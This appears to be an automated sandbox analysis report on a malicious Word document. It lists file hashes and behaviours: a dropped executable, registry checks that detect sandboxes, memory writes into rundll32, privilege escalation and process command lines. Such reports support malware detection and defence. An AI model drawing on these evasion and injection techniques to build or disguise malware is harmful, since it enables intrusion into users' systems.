Analysis
max time kernel: 145s
max time network: 127s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20-05-2024 04:19
Behavioral task: behavioral1
Sample: 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource: win7-20240220-en

Behavioral task: behavioral2
Sample: 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Resource: win10v2004-20240508-en
General
Target: 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc
Size: 392KB
MD5: 5d26fff174b5864a0fd899ccb8c9a3fb
SHA1: dd8726066ddae317bb9415b994e82b8d3c89eb18
SHA256: 54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
SHA512: 524fdc7a602a22d6a0cc662fb89ed3a69491177414f40ede8a0441e2f02292d57b505e6ba03804f413a70f825e41f1420e258128a43967257c515a7fc1ce0246
SSDEEP: 6144:niIpBWik+MmAQoMfMWDceTo59x9r+RSwujd+Ao7pt:iIprkNmAQo0MWDcTbKQTjLott
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
xea_kueou0.exe

| pid | process |
| --- | --- |
| 4944 | xea_kueou0.exe |
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXE

| description | ioc | process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE |
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXE

| description | ioc | process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE |
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXE

| pid | process |
| --- | --- |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xea_kueou0.exe

| pid | process |
| --- | --- |
| 4944 | xea_kueou0.exe |
| 4944 | xea_kueou0.exe |
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
xea_kueou0.exe

| description | pid | process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 4944 | xea_kueou0.exe |
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXE

| pid | process |
| --- | --- |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
| 4984 | WINWORD.EXE |
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXE, xea_kueou0.exe

| description | pid | process | target process |
| --- | --- | --- | --- |
| PID 4984 wrote to memory of 4944 | 4984 | WINWORD.EXE | xea_kueou0.exe |
| PID 4984 wrote to memory of 4944 | 4984 | WINWORD.EXE | xea_kueou0.exe |
| PID 4944 wrote to memory of 948 | 4944 | xea_kueou0.exe | rundll32.exe |
| PID 4944 wrote to memory of 948 | 4944 | xea_kueou0.exe | rundll32.exe |
Processes
-
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 4984
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4944
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1
PID: 948
Network
MITRE ATT&CK Enterprise v15
Downloads